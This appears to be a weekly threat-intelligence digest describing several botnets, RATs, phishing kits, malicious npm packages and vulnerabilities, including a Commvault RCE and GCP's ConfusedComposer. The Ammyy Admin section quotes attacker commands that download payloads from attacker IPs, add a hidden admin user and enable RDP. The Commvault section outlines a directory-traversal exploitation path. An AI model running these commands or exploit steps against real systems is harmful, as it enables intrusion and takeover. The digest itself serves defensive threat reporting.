Ransomware of the Week: RustoBot Botnet: Rust-Based Threat Targeting Routers

Description

RustoBot is a botnet developed in the Rust programming language, specifically exploiting known vulnerabilities in TOTOLINK and DrayTek branded routers. The malware is compiled to support multiple architectures and can hijack devices and launch DDoS attacks.

Detected Vulnerabilities

• CVE-2022-26210: Command injection in TOTOLINK routers
• CVE-2022-26187: Additional command injection vulnerability on TOTOLINK
• CVE-2024-12987: Command injection (cgi-bin interface) in DrayTek devices
• Domain: Globally, primarily in Japan, Taiwan, Vietnam, Mexico

Technical Details

Platform Support

• ARM (arm5, arm6, arm7)
• MIPS, MPSL
• x86

Infection Chain

1. First Stage: Malicious downloader script is placed on web servers.
2. Download: Architecture-specific Rust binary is downloaded using wget or tftp.
3. Execution: The device is included in the botnet by running the binary.

Obfuscation Techniques

• Configuration Data: Encrypted with XOR
• API Usage: Decrypted in memory at runtime (dynamic resolution)
• C2 Communication: Done via DNS-over-HTTPS (DoH)

DDoS Capabilities

• UDP Flood
• TCP Flood
• Raw IP packet flood
• Customizable targeting based on IP, port and size

Effect of the Malware

• Remote Control: Attacker gains full authority on the device
• DDoS Attacks: Intense traffic can be created towards target systems
• Obfuscation: Traffic detection becomes difficult with DoH, network security is bypassed

Used Components

• Downloader script: For the first stage download process
• Rust binary: XOR encrypted configuration, fully integrated with C2 commands
• Commands: Target IP, port and Triggering attacks by payload

Malware of the Week: DslogdRAT Malware Detected on Ivanti Connect Secure Systems

Description

Discovered in December 2024, the zero-day vulnerability CVE-2025-0282 was used by attackers to distribute the DslogdRAT malware on Ivanti Connect Secure devices. Remote command execution was also achieved using a simple Perl-based web shell (ccupdate.cgi).

Detected Vulnerabilities and Malware

• Malware Name: DslogdRAT
• Vulnerability Used: CVE-2025-0282
• Web Shell: Perl CGI
• Command and Control (C2) IP: 3[.]112[.]192[.]119
• Port: 443
• Impact Time Range: 08:00 – 14:00

Technical Details

Web Shell Features

• File Location: /home/webserver/htdocs/dana-na/cc/ccupdate.cgi
• Authentication: DSAUTOKEN=af95380019083db5 in Cookie
• Function: Executes the command in the data parameter with the system() command

DslogdRAT Behavior

1. After the main process is running, it terminates itself and starts a subprocess
2. Subprocess decrypts the XOR encrypted configuration data
3. The second subprocess is started and C2 connection, command execution, proxy operations are performed

• Configuration XOR key: 0x63
• C2 communication data encryption: 0x01-0x07 XOR with 7 byte blocks
• Only works between 08:00-14:00

Encrypted Settings

• Shell: /bin/sh
• Thread: /home/bin/dslogd
• Proxy User: admin
• Proxy Password: admin
• C2 Port: 443
• Local Source Port: 12345

Commands (Appendix B)

• 0x4: Download file
• 0xA: Upload file
• 0xC: Execute shell command
• 0x13: Start proxy
• 0x28: Redirect traffic

Effects

• Remote command execution and system control
• Evade detection with time-based operation
• Network traffic can be redirected to other systems with proxy feature

File Hash Values ​​

• /home/bin/dslogd: 1dd64c00f061425d484dd67b359ad99df533aa430632c55fa7e7617b55dab6a8
• ccupdate.cgi: f48857263991eea1880de0f62b3d1d37101c2e7739dcd8629b24260d08850f9c

Additional Detection: SPAWNSNARE

Another malware called SPAWNSNARE, previously reported by Google and CISA, was also observed on the same system.

MaaS Malware of the Week: NFC-Based SuperCard X Android Malware for Instant Cash Withdrawals

Description

SuperCard X is a malware that uses the NFC (Near Field Communication)imi) feature to perform contactless payment and ATM transactions. The attack chain, which starts with fake banking messages, results in the installation of a malicious application and enables the transfer of card data to the attacker in real-time.

Key Features of the Malware

• Name: SuperCard X
• Platform: Android
• Technology: NFC relay
• Deployment Method: Social engineering and fake banking applications
• Similarity: NFCGate (Open source tool developed by TU Darmstadt)
• Stealth Method: Bypassing AV systems with minimal permissions, mTLS communication

Technical Details

1. Social Engineering: Fake SMS or message is sent to the user, appearing to come from the bank.
2. Persuasion and Guidance: The attacker pretends to be a “bank officer” by forcing the user to call and asks them to install an application for security reasons.
3. Malicious Application: An innocent-looking APK such as “Verifica Carta” or “KingCard NFC” is installed.
4. NFC Data Capture: The card chip data is read when the user touches the card to the phone.
5. C2 Transfer: The data is instantly transmitted to the attacker’s device.
6. Cash Withdrawal: The information obtained is used in POS devices or contactless ATMs.

Impact

• Real-time card data theft
• Instant contactless transaction or ATM withdrawal
• Bypassing traditional fraud detection systems
• Bypassing enterprise mobile security solutions

Technical Components

• NFC relay infrastructure
• Card emulation and Android intent usage
• Mutual TLS (mTLS) for C2 communication
• Minimal permissioned APK design
• Real-time proxy card data transfer

**PhaaS Malware of the Week: SessionShark: Phishing Toolkit to Bypass Microsoft 365 MFA Protection

Description

SessionShark is a new phishing toolkit delivered via phishing-as-a-service (PhaaS) model. It targets Microsoft 365 accounts, bypasses the multi-factor authentication (MFA) barrier, and steals user session cookies to gain unauthorized access to accounts. The toolkit is offered as “educational” on cybercrime forums and distributed via customer support via Telegram.

Technical Details

• Attack Type: Adversary-in-the-Middle (AiTM)
• Target: Microsoft 365 user sessions
• Working Principle:

1. The user is redirected to a fake Microsoft 365 login page.
2. The login information and session cookie are sent to the attacker.
3. The account is accessed directly using the MFA-passed session token.
4. The account is compromised before the cookie expires.

• Features:
• Real-time data transfer
• IP hiding and hosting protection with Cloudflare
• Detection prevention with anti-bot systems
• Customizable HTTP headers and scripts
• Fake login page that mimics the real Microsoft 365 interface

Impact of the Threat

• Disabling the MFA mechanism
• Direct access to corporate accounts
• Risk of data breaches in services such as email, SharePoint, Teams
• Expansion of credential harvesting, chain attacks, and phishing campaigns
• Proxy architecture that can bypass advanced security solutions

**Malicious NPM Packages of the Week: Fake npm Packages: Mimic Telegram Bot API and Inject SSH Backdoors into Linux Systems

Description

Three fake npm packages that mimic the Telegram Bot API aim to gain persistent access by injecting SSH backdoors into Linux systems. These fake packages mimic legitimate Telegram API libraries in order to gain the trust of developers, posing a serious threat to software supply chain security.

Technical Details

• Fake Packages: 3 different npm packages that mimic the Telegram Bot API
• Target Systems: Linux-based operating systems
• Malicious Activity: Persistent system access via SSH backdoors
• Propagation Method: Distribution via npm by mimicry of legitimate API libraries

Package List

• node-telegram-utils (132 downloads)
• node-telegram-bots-api (82 downloads)
• node-telegram-util (73 downloads)

Impact

• System Security: Attackers can gain unauthorized system access via backdoors.
• Data Security: Sensitive data can be stolen or systems can be misused when persistent access is provided.
• Supply Chain Risk: Developers can unknowingly include fake packages in their projects, which can lead to widespread security vulnerabilities.

**Vulnerabilities of the Week

Critical Remote Code Execution Vulnerability in Commvault Command Center (CVE-2025-34028)

Description

A critical vulnerability has been identified in Commvault Command Center 11.38 Innovation Release versions (11.38.0 – 11.38.19). This vulnerability allows arbitrary code to be executed remotely without requiring authentication.this vulnerability has been fixed in versions 11.38.20 and 11.38.25.

Detected CVE

• CVE ID: CVE-2025-34028
• Risk Level: Critical
• CVSS Score: 9.0 (out of 10)
• Description: Authenticated SSRF (Server-Side Request Forgery) on Command Center followed by arbitrary code execution
• Impact: Complete Command Center server compromise

Technical Detail

• The vulnerability resides in the /commandcenter/deployWebpackage.do endpoint.
• This endpoint makes the server download a ZIP archive from an external source and extract it.
• The malicious .JSP file inside the ZIP is extracted to the .tmp folder.
• Using the servicePack parameter, the directory traversal is provided from the .tmp folder to another directory of the server (for example ../../Reports/MetricsUpload/shell).
• Finally, the code is executed by directly running the shell.jsp file.

Attack Flow:

1. An HTTP request is sent to the /commandcenter/deployWebpackage.do endpoint.
2. The server pulls a malicious ZIP file from the attacker-controlled server.
3. The ZIP file is unpacked to the .tmp directory.
4. Using the servicePack parameter, the directory traversal is provided (../../Reports/MetricsUpload/shell).
5. The uploaded shell.jsp file is run.

Impact of Vulnerability or Malware

• Server Control: Attacker can gain full control over the administrative environment.
• Data Breach: Stealing or encrypting backed up sensitive data (ransomware attack).
• Network Lateral Movements: Attacks can be launched against other systems within the organization using the relevant Commvault infrastructure.

Codes / Functions of the Vulnerability

• Endpoint: /commandcenter/deployWebpackage.do
• Manipulation Parameter: servicePack
• Exploitation Type: Server-Side Request Forgery (SSRF) + Arbitrary Code Execution
• Related File: shell.jsp

Ammyy Admin Infection Targeting MS-SQL Servers

Description

A wave of attacks targeting MS-SQL servers with poorly configured and weak passwords has been detected. In these attacks, the remote access software Ammyy Admin is used for malicious purposes. Attackers also integrate the PetitPotato privilege escalation tool to gain full control over the system.

Malware Details

• Ammyy Admin (v3.10): Remote desktop control tool, exhibits RAT-like behavior.
• PetitPotato: Used for creating new users and enabling RDP.
• Method: MS-SQL servers using weak passwords are targeted with brute-force and dictionary attacks.

Technical Details

1. Initial Infiltration Stage

• Target: MS-SQL servers that are open to the Internet and have weak password protection
• Commands Executed:

whoami
net1 user
netstat -an
wmic cpu get name,NumberOfCores

2. Downloading Malware

get.exe -O mscorsvw.exe http://110.45.186[.]8/aa_v3_protected.exe
get.exe -O settings3.bin http://1.220.228[.]82/settings3.bin
get.exe -O p.ax http://110.45.186[.]8/p.log

• mscorsvw.exe: Ammyy Admin
• settings3.bin: Configuration file
• p.ax: PetitPotato privilege escalator

3. Remote Access and Privilege Escalation

p.ax 0 "net1 user a 12[REMOVED]C!@# /ad"
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

• New admin user is created
• RDP connection is activated

Impact of Vulnerability

• Full System Control: Attackers can take over the system with RDP + RAT
• Data Theft and Side Jump: Transition to other systems is possible
• Persistent Access: Persistence is provided with settings3.bin

Used Codes/Functions

• mscorsvw.exe: Ammyy Admin client
• p.ax: PetitPotato
• get.exe: File downloader

ConfusedComposer: Privilege Escalation Vulnerability Detected in GCP Cloud Composer Service

Description

The vulnerability, known as “ConfusedComposer”, was discovered in the Cloud Composer service on Google Cloud Platform (GCP). Environments running on this Apache Airflow-based service allowed the Cloud Build service account privileges to be exploited via malicious PyPI packages. This poses critical risks such as privilege escalation and broad system access in GCP projects.

Identified Vulnerability

• Vulnerability Name: ConfusedComposer
• Service: GCP Cloud Composer
• Description: Users with composer.environments.update privileges were able to run commands via the Cloud Build service account by installing custom PyPI packages.
• Areas Affected:
• Cloud Build
• Cloud Storage
• Artifact Registry
• Status: Google patched the vulnerability as of April 13, 2025.

Technical Details

The vulnerability is based on the installation of an external custom PyPI package in the Composer environment and the installation phase of this package by running scripts such as setup.py in the Cloud Build container.

Attack Steps:

1. The attacker installs a custom PyPI package in the Composer environmenter.
2. The malicious setup.py script included in the package is triggered.
3. Cloud Build executes the script while installing this package.
4. The script accesses GCP resources with the Cloud Build service account credentials.

Additional Information:

• The Cloud Build service was running with a high privileged service account assigned to the Composer environment.
• This structure allowed the attacker to take over the CI/CD infrastructure.
• Google’s solution:
• Package installation operations are now done with the Composer environment’s special service account instead of Cloud Build.

Impact

• Unauthorized resource access within GCP (Cloud Storage, Artifact Registry etc.)
• Malicious code injection into CI/CD chain
• Persistent backdoor creation and service abuse

Code/Source Details of the Vulnerability

• composer.environments.update permission is sufficient to trigger the vulnerability.
• Malicious code is placed in installation scripts such as setup.py.
• Access to wide range of GCP services was possible with Cloud Build identity.